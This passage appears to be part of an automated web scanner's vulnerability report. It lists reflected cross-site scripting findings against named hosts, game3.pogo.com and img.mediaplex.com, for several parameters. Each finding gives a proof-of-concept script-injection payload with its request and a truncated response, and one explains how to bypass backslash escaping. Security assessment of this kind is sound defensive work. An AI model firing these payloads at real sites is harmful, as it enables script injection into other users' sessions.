GET /room/loading/init.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:22 GMT Server: Apache-Coyote/1.1 Content-Length: 851 <html> <head> <script src="/v/D7rqgA/js/room.js <script> function load() { window.LoadingFrame ...[SNIP]... <frame name="AdFrame" src="/exhibit/loading ...[SNIP]... |
3.495. http://game3.pogo.com/room/loading/init.jsp [anam parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/init.jsp |
Issue detail
The value of the anam request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 481a1"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:21 GMT Server: Apache-Coyote/1.1 Content-Length: 847 <html> <head> <script src="/v/D7rqgA/js/room.js <script> function load() { window.LoadingFrame ...[SNIP]... <frame name="AdFrame" src="/exhibit/loading ...[SNIP]... |
3.496. http://game3.pogo.com/room/loading/init.jsp [apid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/init.jsp |
Issue detail
The value of the apid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f60b"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:21 GMT Server: Apache-Coyote/1.1 Content-Length: 851 <html> <head> <script src="/v/D7rqgA/js/room.js <script> function load() { window.LoadingFrame ...[SNIP]... <frame name="AdFrame" src="/exhibit/loading ...[SNIP]... |
3.497. http://game3.pogo.com/room/loading/init.jsp [auto parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/init.jsp |
Issue detail
The value of the auto request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ecf"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:31 GMT Server: Apache-Coyote/1.1 Content-Length: 858 <html> <head> <script src="/v/D7rqgA/js/room.js <script> function load() { window.LoadingFrame ...[SNIP]... oading.jsp?pwid=620&phei ...[SNIP]... |
3.498. http://game3.pogo.com/room/loading/init.jsp [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/init.jsp |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ea62</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /room/loading/init.jsp?8ea62</script><script Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Content-Length: 4188 Date: Sun, 09 Jan 2011 02:14:50 GMT Server: Apache-Coyote/1.1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Address Messed Up </title> ...[SNIP]... TrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://game3 s.eVar2="pogo"; s.pageName="ERROR: Address Messed Up Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated ...[SNIP]... |
3.499. http://game3.pogo.com/room/loading/init.jsp [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/init.jsp |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc140"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:32 GMT Server: Apache-Coyote/1.1 Content-Length: 868 <html> <head> <script src="/v/D7rqgA/js/room.js <script> function load() { window.LoadingFrame ...[SNIP]... sp?pwid=760&phei=574&site ...[SNIP]... |
3.500. http://game3.pogo.com/room/loading/init.jsp [rhst parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/init.jsp |
Issue detail
The value of the rhst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ea8"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:24 GMT Server: Apache-Coyote/1.1 Content-Length: 852 <html> <head> <script src="/v/D7rqgA/js/room.js <script> function load() { window.LoadingFrame ...[SNIP]... AdFrame" src="/exhibit/loading ...[SNIP]... |
3.501. http://game3.pogo.com/room/loading/init.jsp [rspt parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/init.jsp |
Issue detail
The value of the rspt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfa77"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:22 GMT Server: Apache-Coyote/1.1 Content-Length: 860 <html> <head> <script src="/v/D7rqgA/js/room.js <script> function load() { window.LoadingFrame ...[SNIP]... <frame name="AdFrame" src="/exhibit/loading ...[SNIP]... |
3.502. http://game3.pogo.com/room/loading/init.jsp [scrn parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/init.jsp |
Issue detail
The value of the scrn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1fca"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:12 GMT Server: Apache-Coyote/1.1 Content-Length: 860 <html> <head> <script src="/v/D7rqgA/js/room.js <script> function load() { window.LoadingFrame ...[SNIP]... <frame name="AdFrame" src="/exhibit/loading ...[SNIP]... |
3.503. http://game3.pogo.com/room/loading/init.jsp [ugifts parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/init.jsp |
Issue detail
The value of the ugifts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eecd"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:23 GMT Server: Apache-Coyote/1.1 Content-Length: 864 <html> <head> <script src="/v/D7rqgA/js/room.js <script> function load() { window.LoadingFrame ...[SNIP]... name="AdFrame" src="/exhibit/loading ...[SNIP]... |
3.504. http://game3.pogo.com/room/loading/jvmtest.jsp [ahst parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/jvmtest.jsp |
Issue detail
The value of the ahst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6724c"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:26 GMT Server: Apache-Coyote/1.1 Content-Length: 1457 <html> <script type="text/javascript"> function show(dest) { if (top.window.opener) { top.window.opener top.window.close(); } else { top.window. ...[SNIP]... <applet mayscript="true" width="0" height="0" code="com.pogo.client ...[SNIP]... |
3.505. http://game3.pogo.com/room/loading/jvmtest.jsp [anam parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/jvmtest.jsp |
Issue detail
The value of the anam request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4401e"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:26 GMT Server: Apache-Coyote/1.1 Content-Length: 1414 <html> <script type="text/javascript"> function show(dest) { if (top.window.opener) { top.window.opener top.window.close(); } else { top.window. ...[SNIP]... <param name="url" value="/room/loading ...[SNIP]... |
3.506. http://game3.pogo.com/room/loading/jvmtest.jsp [apid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/jvmtest.jsp |
Issue detail
The value of the apid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e635"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:26 GMT Server: Apache-Coyote/1.1 Content-Length: 1414 <html> <script type="text/javascript"> function show(dest) { if (top.window.opener) { top.window.opener top.window.close(); } else { top.window. ...[SNIP]... <param name="url" value="/room/loading ...[SNIP]... |
3.507. http://game3.pogo.com/room/loading/jvmtest.jsp [auto parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/jvmtest.jsp |
Issue detail
The value of the auto request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b03"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:36 GMT Server: Apache-Coyote/1.1 Content-Length: 1414 <html> <script type="text/javascript"> function show(dest) { if (top.window.opener) { top.window.opener top.window.close(); } else { top.window. ...[SNIP]... m/loading/loading.jsp ...[SNIP]... |
3.508. http://game3.pogo.com/room/loading/jvmtest.jsp [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/jvmtest.jsp |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e13d1"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:37 GMT Server: Apache-Coyote/1.1 Content-Length: 1417 <html> <script type="text/javascript"> function show(dest) { if (top.window.opener) { top.window.opener top.window.close(); } else { top.window. ...[SNIP]... /loading/loading.jsp?site ...[SNIP]... |
3.509. http://game3.pogo.com/room/loading/jvmtest.jsp [rhst parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/jvmtest.jsp |
Issue detail
The value of the rhst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c459"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:27 GMT Server: Apache-Coyote/1.1 Content-Length: 1414 <html> <script type="text/javascript"> function show(dest) { if (top.window.opener) { top.window.opener top.window.close(); } else { top.window. ...[SNIP]... aram name="url" value="/room/loading ...[SNIP]... |
3.510. http://game3.pogo.com/room/loading/jvmtest.jsp [rspt parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/jvmtest.jsp |
Issue detail
The value of the rspt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8e12"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:26 GMT Server: Apache-Coyote/1.1 Content-Length: 1414 <html> <script type="text/javascript"> function show(dest) { if (top.window.opener) { top.window.opener top.window.close(); } else { top.window. ...[SNIP]... <param name="url" value="/room/loading ...[SNIP]... |
3.511. http://game3.pogo.com/room/loading/jvmtest.jsp [scrn parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/jvmtest.jsp |
Issue detail
The value of the scrn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68fd3"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:14 GMT Server: Apache-Coyote/1.1 Content-Length: 1414 <html> <script type="text/javascript"> function show(dest) { if (top.window.opener) { top.window.opener top.window.close(); } else { top.window. ...[SNIP]... <param name="url" value="/room/loading ...[SNIP]... |
3.512. http://game3.pogo.com/room/loading/jvmtest.jsp [ugifts parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/jvmtest.jsp |
Issue detail
The value of the ugifts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c99"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:27 GMT Server: Apache-Coyote/1.1 Content-Length: 1414 <html> <script type="text/javascript"> function show(dest) { if (top.window.opener) { top.window.opener top.window.close(); } else { top.window. ...[SNIP]... <param name="url" value="/room/loading ...[SNIP]... |
3.513. http://game3.pogo.com/room/loading/loading.jsp [ahst parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/loading.jsp |
Issue detail
The value of the ahst request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb224\'%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.Request
GET /room/loading/loading.jsp Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:14:53 GMT Server: Apache-Coyote/1.1 Content-Length: 1927 <html> <body> <script language="javascript"> function setVisible(elementName, visible) { elementToChangeState = getElementReference //alert('found element ...[SNIP]... <applet mayscript="true" width="0" height="0" code="com.pogo.client ...[SNIP]... |
3.514. http://game3.pogo.com/room/loading/loading.jsp [ahst parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/loading.jsp |
Issue detail
The value of the ahst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daa89"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/loading.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:25 GMT Server: Apache-Coyote/1.1 Content-Length: 1978 <html> <body> <script language="javascript"> function setVisible(elementName, visible) { elementToChangeState = getElementReference //alert('found element ...[SNIP]... <applet mayscript="true" width="0" height="0" code="com.pogo.client ...[SNIP]... |
3.515. http://game3.pogo.com/room/loading/loading.jsp [ctim parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/loading.jsp |
Issue detail
The value of the ctim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61840"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/loading.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:35 GMT Server: Apache-Coyote/1.1 Content-Length: 1856 <html> <body> <script language="javascript"> function setVisible(elementName, visible) { elementToChangeState = getElementReference //alert('found element ...[SNIP]... <param name="ctim" value="129453690242361840"><script>alert(1)< ...[SNIP]... |
3.516. http://img.mediaplex.com/cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js [mpck parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /cgi-bin/html/0/7440/MT |
Issue detail
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25a4f"%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /cgi-bin/html/0/7440/MT Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=517004695355 |
Response
